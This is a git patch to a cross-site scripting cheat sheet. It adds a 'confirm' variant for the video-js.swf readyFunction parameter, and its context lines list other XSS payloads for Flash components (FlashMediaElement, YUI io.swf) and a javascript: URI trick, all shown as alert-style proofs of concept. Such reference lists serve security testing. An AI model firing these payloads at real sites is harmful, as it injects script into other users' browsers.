From b8f3aa96e31a428b34c7601f31cd8873b03a3939 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Sun, 1 Oct 2017 22:04:49 +0100 Subject: [PATCH] [XSS] add video-js example variant --- cheatsheets/xss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index c2d7b76..26f0eae 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -120,7 +120,7 @@ javas cript://www.google.com/%0Aalert(1) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` -- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` +- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`